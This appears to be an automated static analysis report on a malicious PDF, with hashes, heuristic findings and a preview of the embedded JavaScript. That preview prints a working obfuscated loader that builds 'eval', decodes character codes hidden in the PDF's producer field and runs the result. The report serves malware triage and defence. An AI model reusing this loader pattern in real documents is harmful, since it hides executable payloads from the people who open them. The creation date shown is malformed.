Malicious PDF — malware analysis report

Static analysis result for SHA-256 3b658927c00da73f…

MALICIOUS

PDF

22.2 KB Created: 2011-72-51 03:25:00 First seen: 2026-05-09
MD5: b066717bc3f9f4e566f965c95aa7ac82 SHA-1: c7753798552b76ecf1501adac3bd9398d676cd0e SHA-256: 3b658927c00da73fc549ee03f4876b54d0dccc1c487e37f9fcefbffdeb5e5126
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file was flagged as suspicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, which is often used to exploit PDF reader vulnerabilities or download further malicious content. The JavaScript stream itself is obfuscated, making its exact function difficult to determine, but its presence and obfuscation are strong indicators of malicious intent. No document body text was available for analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     s += String.fromCharCode\(q\);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x568A 350 bytes
SHA-256: 2f93f448c39104471de7850a142c356ee62861b2976f26590226dc2c5fbfb86a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
eyf = app;
lrq = new Date(2010,11,3);
var davqi='';
var stvh =lrq.getHours()+'al';
stvh = stvh.replace(0,'ev');
dcn=eyf[stvh];
dcn('va'+davqi+'r gggj=th'+davqi+'i'+davqi+'s.producer');
gggj = gggj.substr(4);
ar = gggj.split(',');
var s = '';
for (i = 0; i < ar.length; i++) {
	q = dcn(ar[i]);
	s += String.fromCharCode(q);
}
dcn(s);

Open this report in the interactive analyzer, or submit your own file for analysis.